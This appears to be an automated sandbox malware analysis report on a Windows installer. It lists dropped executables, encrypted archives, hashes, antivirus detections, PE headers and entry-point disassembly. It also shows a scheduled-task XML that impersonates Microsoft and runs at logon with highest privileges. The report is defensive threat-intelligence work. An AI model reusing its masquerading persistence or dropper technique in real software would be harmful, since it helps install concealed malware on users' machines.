                                                        SHA1:FA3DC96A3336903ED5E6105A197A02E618E3F634
                                                        SHA-256:1CBF36AFC14ECC78E133EBEC8A6EE1C93DEA85EEC472CE0FB0B57D3E093F08CC
                                                        SHA-512:E2732D3E092B0A7507653A4743E1FE7A1010A20D4973C209BA7C0B2B79F02DF3CFDB4D7CE1CBFB62AA0C3D2CDE468FC2C78558DA4FF871660355E71DC77D8219
                                                        Malicious:false
                                                        Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):29730
                                                        Entropy (8bit):7.994290657653607
                                                        Encrypted:true
                                                        SSDEEP:768:e7fyvDZi63BuPi2zBBMqUp6fJzwyQb91SPlssLK4:AfKNiG/2vMx6fJzwVb2tss7
                                                        MD5:2C3E0D1FB580A8F0855355CC7D8D4F7A
                                                        SHA1:177E4A0B7C4BC8ACE0F46127398808E669222515
                                                        SHA-256:9818FEBDE34D7E9900EB1C7A32983CA60C676BE941E2BC1ED9FBD5A187C6F544
                                                        SHA-512:B9410FC8F5BE02130D50E7389F9A334DD2F2A47694E88FBB9FB4561BD3296F894369B279546EEBB376452DF795C39D87A67C6EE84C362F47FA19CF4C79E5574E
                                                        Malicious:false
                                                        Process:C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp
                                                        File Type:7-zip archive data, version 0.4
                                                        Category:dropped
                                                        Size (bytes):29730
                                                        Entropy (8bit):7.994290657653608
                                                        Encrypted:true
                                                        SSDEEP:768:0AnbQm4/4qQyDC44LY4VfQ8aN/DObt1dSt3OUqZNKME:0ab6c4oY0aBDObjot+Uqu7
                                                        MD5:A9C8A3E00692F79E1BA9693003F85D18
                                                        SHA1:5ED62E15A8AC5D49FD29EF2A8DC05D24B2E0FC1F
                                                        SHA-256:B88E3170EC6660651AF1606375F033F42D3680E4365863675D0E81866E086CC3
                                                        SHA-512:8354B80622A9808606F1751A53F865C341FF2CE1581B489B50B1181DAA9B2C0A919F94137F47898A4529ECCCD96C43FCCD30BCDF6220FA4017235053AF0B477D
                                                        Malicious:false
                                                        Process:C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp
                                                        File Type:7-zip archive data, version 0.4
                                                        Category:dropped
                                                        Size (bytes):250000
                                                        Entropy (8bit):7.999233217470124
                                                        Encrypted:true
                                                        SSDEEP:6144:1CV1oCvUxznH9Oxyyt42fnM+KhFtVbiOO:AV1o4Wzn9l2/HonbiP
                                                        MD5:8ABFBD435E4C97ADECC98054531BDB10
                                                        SHA1:45EE0AE577F885C664C7CBB9465DC3F5602D52DC
                                                        SHA-256:2D6F169B3A86F7A5167C882D6AC0C600C4BDB50751D63873F77673EB01C6FB0F
                                                        SHA-512:EB62FA8CF7B481EC94368A4329E599FFE891DF489F8D3DB51B1A6CA5637BBD3C397ACD3FE6025732315A072ABE7059CFB97A7E20DB31991C80C5F63F83918C18
                                                        Malicious:false
                                                        Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                                        File Type:PE32+ executable (native) x86-64, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):63640
                                                        Entropy (8bit):6.482810107683822
                                                        Encrypted:false
                                                        SSDEEP:768:4l2NchwQqrK3SBq3Xf2Zm+Oo1acHyKWkm9loSZVHT4yy5FPSFlWd/Ce34nqciC50:kgrFq3OVgUgla/4nqy5K2/zW
                                                        MD5:B4EAACCE30F51EAF2A36CEA680B45A66
                                                        SHA1:94493D7739C5EE7346DA31D9523404D62682B195
                                                        SHA-256:15E84D040C2756B2D1B6C3F99D5A1079DC8854844D3C24D740FAFD8C668E5FB9
                                                        SHA-512:16F46ABE2DD8C1A95705C397B0A5A0BC589383B60FE7C4F25503781D47160C0D68CBA0113BA918747115EF27A48AB7CA7F56CC55920F097313A2DA73343DF10B
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 9%
                                                        • Antivirus: Virustotal, Detection: 4%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s.[.7.5N7.5N7.5N7.4NX.5NA'NN4.5NA'HN5.5N.|XN4.5N.|HN6.5NA'XN6.5N.|DN0.5N.|IN6.5N.|MN6.5NRich7.5N........................PE..d....(gK..........".........."............................................... ..............................................................d...(........................(.......... ................................................................................text............................... ..h.rdata..............................@..H.data...............................@....pdata..............................@..HINIT................................ ....rsrc...............................@..B.reloc..0...........................@..B................................................................................................................................................................................................................
                                                        Process:C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):4096
                                                        Entropy (8bit):3.344834847024567
                                                        Encrypted:false
                                                        SSDEEP:48:dXKLzDlnbL6w0QldOVQOj933ODOiTdKbKsz72eW+5y4:dXazDlnKwhldOVQOj6dKbKsz7
                                                        MD5:7F252B19B6E96247184F55570325E9FA
                                                        SHA1:E6D4AD432CB4864C0E1A08FB15255F7973807B3D
                                                        SHA-256:84460DE817C9A6637650C7ED83D15DD14836FB841FF9790D4F2D1A8D6BAAB0ED
                                                        SHA-512:A5741E4F5095BB24A28E5909CC659CB53535BD1E7A2555FA9D2660155F8CA80F96136E2CA589CCD2154FCF264B8FD525782B8C9752022B986F20D3F1454496EF
                                                        Malicious:false
                                                        Preview:<Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2005-10-11T13:21:17-08:00</Date>. <Author>Microsoft Corporation</Author>. <Version>1.0.0</Version>. <Description>Microsoft</Description>. <URI>\kafanbbs</URI>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user</UserId>. </LogonTrigger>. </Triggers>. <Principals>. <Principal id="System">. <UserId>user</UserId>. <RunLevel>HighestAvailable</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvai
                                                        Process:C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp
                                                        File Type:PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows
                                                        Category:dropped
                                                        Size (bytes):5649408
                                                        Entropy (8bit):6.392614480390128
                                                        Encrypted:false
                                                        SSDEEP:98304:jgRfP5jnFTyGZEWxSIBHVGT+t1ufqchZ:kRZDFTyGaHIJoWofqc
                                                        MD5:8C71B86BF407C05BAF11E8D296B9C8B8
                                                        SHA1:6624AB8CA883C48F02C58250D4EEE9E90098F4E4
                                                        SHA-256:BE2099C214F63A3CB4954B09A0BECD6E2E34660B886D4C898D260FEBFE9D70C2
                                                        SHA-512:BB3FEE727E40F8213F0A7D9808048E341295A684ECBA6F4DF52F1B07B528D7206CA41926B2433F4B63451565AD2854570FEE976BC7051B629ACD24FCA6D0F507
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                        • Antivirus: Virustotal, Detection: 0%, Browse
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......................&.ZF..0V..<.............@..............................V.....L.V...`... ...............................................V../...........0O..............`V.\a...........................vL.(.....................V..............................text....XF......ZF.................`..`.data....z...pF..|...^F.............@....rdata.. 9....F..:....F.............@..@.pdata.......0O.......O.............@..@.xdata........Q.......Q.............@..@.bss.....;....U..........................idata.../....V..0....U.............@....CRT....h....@V.......U.............@....tls.........PV.......U.............@....reloc..\a...`V..b....U.............@..B................................................................................................................................................................................................................
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):64
                                                        Entropy (8bit):1.1940658735648508
                                                        Encrypted:false
                                                        SSDEEP:3:NlllulXg+//lz:NllUwu/l
                                                        MD5:ED0FF51DEEE7DB96EC9C5624C12E0A04
                                                        SHA1:515B7FC63DB9F9313A6AEE6B4A6266B0FB6FF3A7
                                                        SHA-256:B93B1F8411ACBB11CBECF0F4E344D7D6D3551801BD891B816FB4720E60CE357B
                                                        SHA-512:FD82F7D0B1B6F1641D2FF3F4EC6FEF66E2AB0F2048D7A5BBC674C379DD429516198FFD6E6E445C6EC1A2763ADAACF6288026B4A90697D86C8EED743A71F177ED
                                                        Malicious:false
                                                        Preview:@...e.................................F..............@..........
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                        Process:C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exe
                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):3366912
                                                        Entropy (8bit):6.530548291878271
                                                        Encrypted:false
                                                        SSDEEP:98304:nJYVM+LtVt3P/KuG2ONG9iqLRQE9333T:2VL/tnHGYiql5F
                                                        MD5:9902FA6D39184B87AED7D94A037912D8
                                                        SHA1:F5D8470ACF5DFF81C6D3364A8943B24E3DB48D95
                                                        SHA-256:43D9F1FA3BDA81C618CC23FBB4E9D8551305AF0090A3D452C4070F938F6BCFAC
                                                        SHA-512:BC97E2C379C464F821AF0E38630DB65165F4E91A1105A3C7DABCC5E61CC9EAAB1522AC82E749AA4FEFC5A9E21A295A0A59CFE99D6BC3980F9C89F00AF5B8CF75
                                                        Malicious:true
                                                        Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f..................*...........*.......*...@..........................04...........@......@...................P,.n.....,.j:...P0.......................,.<............................p,.......................,......@,.(....................text.....*.......*................. ..`.itext..$.....*..0....*............. ..`.data.........*.......*.............@....bss.....|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc........P0......./.............@..@.............04......`3.............@..@................
                                                        Process:C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exe
                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):3366912
                                                        Entropy (8bit):6.530548291878271
                                                        Encrypted:false
                                                        SSDEEP:98304:nJYVM+LtVt3P/KuG2ONG9iqLRQE9333T:2VL/tnHGYiql5F
                                                        MD5:9902FA6D39184B87AED7D94A037912D8
                                                        SHA1:F5D8470ACF5DFF81C6D3364A8943B24E3DB48D95
                                                        SHA-256:43D9F1FA3BDA81C618CC23FBB4E9D8551305AF0090A3D452C4070F938F6BCFAC
                                                        SHA-512:BC97E2C379C464F821AF0E38630DB65165F4E91A1105A3C7DABCC5E61CC9EAAB1522AC82E749AA4FEFC5A9E21A295A0A59CFE99D6BC3980F9C89F00AF5B8CF75
                                                        Malicious:true
                                                        Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f..................*...........*.......*...@..........................04...........@......@...................P,.n.....,.j:...P0.......................,.<............................p,.......................,......@,.(....................text.....*.......*................. ..`.itext..$.....*..0....*............. ..`.data.........*.......*.............@....bss.....|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc........P0......./.............@..@.............04......`3.............@..@................
                                                        Process:C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp
                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):6144
                                                        Entropy (8bit):4.720366600008286
                                                        Encrypted:false
                                                        SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                                                        MD5:E4211D6D009757C078A9FAC7FF4F03D4
                                                        SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                                                        SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                                                        SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                                                        Malicious:false
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................
                                                        Process:C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp
                                                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):3598848
                                                        Entropy (8bit):7.004949099807939
                                                        Encrypted:false
                                                        SSDEEP:49152:OLI2LSDJWhsk/42oQ6C+NkdkcQdhjee71MzuiehWIKxZUQjOlwz+cxtVI8q29Zlc:OLVLAJG42oaPQdhCe71MzSRsyo29Al
                                                        MD5:1D1464C73252978A58AC925ECE57F0FB
                                                        SHA1:30E442BE965F96F3EB75A3ABDB61B90E5A506993
                                                        SHA-256:05184064FB017025E0704D75D199BAE02EBBD30AE4D76FB237DF9596CE6450AA
                                                        SHA-512:40165B34D6BC63472C3874AAC1FB25B19880F5DFE662F672181728732DC80503A64EF4A8058A410755A321D6BDB7314387464DD8243D6E912F37D5032177928A
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 11%
                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....gg...........!.....b..........%........................................p7...........@.........................HC.......J..<.... 7.X....................07.8?..........................x........................K...............................text...`a.......b.................. ..`.rdata..<............f..............@..@.data................\..............@....00cfg.......`(.......(.............@..@.tls.........p(.......(.............@....voltbl.F.....(...... (..................=~ .........(......"(............. ..`.rsrc...X.... 7.......6.............@..@.reloc..8?...07..@....6.............@..B................................................................................................................................................................................................................................................................................
                                                        Process:C:\Users\user\AppData\Local\Temp\is-A58KC.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp
                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):6144
                                                        Entropy (8bit):4.720366600008286
                                                        Encrypted:false
                                                        SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                                                        MD5:E4211D6D009757C078A9FAC7FF4F03D4
                                                        SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                                                        SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                                                        SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                                                        Malicious:false
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................
                                                        Process:C:\Users\user\AppData\Local\Temp\is-A58KC.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp
                                                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):3598848
                                                        Entropy (8bit):7.004949099807939
                                                        Encrypted:false
                                                        SSDEEP:49152:OLI2LSDJWhsk/42oQ6C+NkdkcQdhjee71MzuiehWIKxZUQjOlwz+cxtVI8q29Zlc:OLVLAJG42oaPQdhCe71MzSRsyo29Al
                                                        MD5:1D1464C73252978A58AC925ECE57F0FB
                                                        SHA1:30E442BE965F96F3EB75A3ABDB61B90E5A506993
                                                        SHA-256:05184064FB017025E0704D75D199BAE02EBBD30AE4D76FB237DF9596CE6450AA
                                                        SHA-512:40165B34D6BC63472C3874AAC1FB25B19880F5DFE662F672181728732DC80503A64EF4A8058A410755A321D6BDB7314387464DD8243D6E912F37D5032177928A
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 11%
                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....gg...........!.....b..........%........................................p7...........@.........................HC.......J..<.... 7.X....................07.8?..........................x........................K...............................text...`a.......b.................. ..`.rdata..<............f..............@..@.data................\..............@....00cfg.......`(.......(.............@..@.tls.........p(.......(.............@....voltbl.F.....(...... (..................=~ .........(......"(............. ..`.rsrc...X.... 7.......6.............@..@.reloc..8?...07..@....6.............@..B................................................................................................................................................................................................................................................................................
                                                        Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                                        File Type:ASCII text, with CRLF, CR line terminators
                                                        Category:dropped
                                                        Size (bytes):406
                                                        Entropy (8bit):5.117520345541057
                                                        Encrypted:false
                                                        SSDEEP:6:AMpUMcvtFHcAxXF2SaioBGWOSTIPAiTVHsCgN/J2+ebVcdsvUGrFfpap1tNSK6n:pCXVZRwXkWDThGHs/JldsvhJA1tNS9n
                                                        MD5:9200058492BCA8F9D88B4877F842C148
                                                        SHA1:EED69748A26CFAF769EF589F395A162E87005B36
                                                        SHA-256:BAFB8C87BCB80E77FF659D7B8152145866D8BD67D202624515721CBF38BA8745
                                                        SHA-512:312AB0CBA3151B3CE424198C0855EEE39CC06FC8271E3D49134F00D7E09407964F31D3107169479CE4F8FD85D20BBD3F5309D3052849021954CD46A0B723F2A9
                                                        Malicious:false
                                                        Preview:..7-Zip (a) 23.01 (x86) : Copyright (c) 1999-2023 Igor Pavlov : 2023-06-20....Scanning the drive for archives:.. 0M Scan. .1 file, 31890 bytes (32 KiB)....Extracting archive: locale3.dat..--..Path = locale3.dat..Type = 7z..Physical Size = 31890..Headers Size = 354..Method = LZMA2:16 LZMA:16 BCJ2 7zAES..Solid = -..Blocks = 1.... 0%. .Everything is Ok....Size: 63640..Compressed: 31890..
                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                        Entropy (8bit):7.921128632410474
                                                        TrID:
                                                        • Win32 Executable (generic) a (10002005/4) 98.04%
                                                        • Inno Setup installer (109748/4) 1.08%
                                                        • InstallShield setup (43055/19) 0.42%
                                                        • Win32 EXE PECompact compressed (generic) (41571/9) 0.41%
                                                        • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                        File name:#U5b89#U88c5#U52a9#U624b_2.0.4.exe
                                                        File size:5'707'417 bytes
                                                        MD5:a32b45411fdacb8dc364e2ecc75f7c54
                                                        SHA1:a1d3298f2e0ec913d269c8e393ddf49f6cd8fdbc
                                                        SHA256:1f20c061d4c41e3e775e80d6aabf5f23d88fbf25923f5821e81b824ef1d1ee46
                                                        SHA512:9f353857e6e8871c236c1f04f9f2285aa50a9b697da2c2adcd7a9f1bf6fcd7dcaffdcb111333432366eb709b10ee7108cfaf354c89d203a53d768268e393f195
                                                        SSDEEP:98304:XwREri0dWV2OQavkTsvav3PlP4mJ3EANJhSzkYDKjgJdMwZgf:lvdEzQavkTsvafPlAmJ31DSIYCIs
                                                        TLSH:1A461213F2CBE43EE0590B3B05B3A15494FB6A11A523AE5696ECB4ECCF311601E3E657
                                                        File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                                                        Icon Hash:0c0c2d33ceec80aa
                                                        Entrypoint:0x4a83bc
                                                        Entrypoint Section:.itext
                                                        Digitally signed:false
                                                        Imagebase:0x400000
                                                        Subsystem:windows gui
                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                        Time Stamp:0x6690DABD [Fri Jul 12 07:26:53 2024 UTC]
                                                        TLS Callbacks:
                                                        CLR (.Net) Version:
                                                        OS Version Major:6
                                                        OS Version Minor:1
                                                        File Version Major:6
                                                        File Version Minor:1
                                                        Subsystem Version Major:6
                                                        Subsystem Version Minor:1
                                                        Import Hash:40ab50289f7ef5fae60801f88d4541fc
                                                        Instruction
                                                        push ebp
                                                        mov ebp, esp
                                                        add esp, FFFFFFA4h
                                                        push ebx
                                                        push esi
                                                        push edi
                                                        xor eax, eax
                                                        mov dword ptr [ebp-3Ch], eax
                                                        mov dword ptr [ebp-40h], eax
                                                        mov dword ptr [ebp-5Ch], eax
                                                        mov dword ptr [ebp-30h], eax
                                                        mov dword ptr [ebp-38h], eax
                                                        mov dword ptr [ebp-34h], eax
                                                        mov dword ptr [ebp-2Ch], eax
                                                        mov dword ptr [ebp-28h], eax
                                                        mov dword ptr [ebp-14h], eax
                                                        mov eax, 004A2EBCh
                                                        call 00007F04686F9A35h
                                                        xor eax, eax
                                                        push ebp
                                                        push 004A8AC1h
                                                        push dword ptr fs:[eax]
                                                        mov dword ptr fs:[eax], esp
                                                        xor edx, edx
                                                        push ebp
                                                        push 004A8A7Bh
                                                        push dword ptr fs:[edx]
                                                        mov dword ptr fs:[edx], esp
                                                        mov eax, dword ptr [004B0634h]
                                                        call 00007F046878B3BBh
                                                        call 00007F046878AF0Eh
                                                        lea edx, dword ptr [ebp-14h]
                                                        xor eax, eax
                                                        call 00007F0468785BE8h
                                                        mov edx, dword ptr [ebp-14h]
                                                        mov eax, 004B41F4h
                                                        call 00007F04686F3AE3h
                                                        push 00000002h
                                                        push 00000000h
                                                        push 00000001h
                                                        mov ecx, dword ptr [004B41F4h]
                                                        mov dl, 01h
                                                        mov eax, dword ptr [0049CD14h]
                                                        call 00007F0468786F13h
                                                        mov dword ptr [004B41F8h], eax
                                                        xor edx, edx
                                                        push ebp
                                                        push 004A8A27h
                                                        push dword ptr fs:[edx]
                                                        mov dword ptr fs:[edx], esp
                                                        call 00007F046878B443h
                                                        mov dword ptr [004B4200h], eax
                                                        mov eax, dword ptr [004B4200h]
                                                        cmp dword ptr [eax+0Ch], 01h
                                                        jne 00007F046879212Ah
                                                        mov eax, dword ptr [004B4200h]
                                                        mov edx, 00000028h
                                                        call 00007F0468787808h
                                                        mov edx, dword ptr [004B4200h]
                                                        Name | Virtual Address | Virtual Size | Is in Section
                                                        IMAGE_DIRECTORY_ENTRY_EXPORT | 0xb7000 | 0x71 | .edata
                                                        IMAGE_DIRECTORY_ENTRY_IMPORT | 0xb5000 | 0xfec | .idata
                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xcb000 | 0x11000 | .rsrc
                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xba000 | 0x10fa8 | .reloc
                                                        IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_TLS | 0xb9000 | 0x18 | .rdata
                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_IAT | 0xb52d4 | 0x25c | .idata
                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0xb6000 | 0x1a4 | .didata
                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                                        Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                        .text | 0x1000 | 0xa568c | 0xa5800 | b889d302f6fc48a904de33d8d947ae80 | False | 0.3620185045317221 | data | 6.377190161826806 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                        .itext | 0xa7000 | 0x1b64 | 0x1c00 | 588dd0a8ab499300d3701cbd11b017d9 | False | 0.548828125 | data | 6.109264411030635 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                        .data | 0xa9000 | 0x3838 | 0x3a00 | 5c0c76e77aef52ebc6702430837ccb6e | False | 0.35338092672413796 | data | 4.95916338709992 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                        .bss | 0xad000 | 0x7258 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                        .idata | 0xb5000 | 0xfec | 0x1000 | 627340dff539ef99048969aa4824fb2d | False | 0.380615234375 | data | 5.020404933181373 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                        .didata | 0xb6000 | 0x1a4 | 0x200 | fd11c1109737963cc6cb7258063abfd6 | False | 0.34765625 | data | 2.729290535217263 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                        .edata | 0xb7000 | 0x71 | 0x200 | 7de8ca0c7a61668a728fd3a88dc0942d | False | 0.1796875 | data | 1.305578535725827 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        .tls | 0xb8000 | 0x18 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
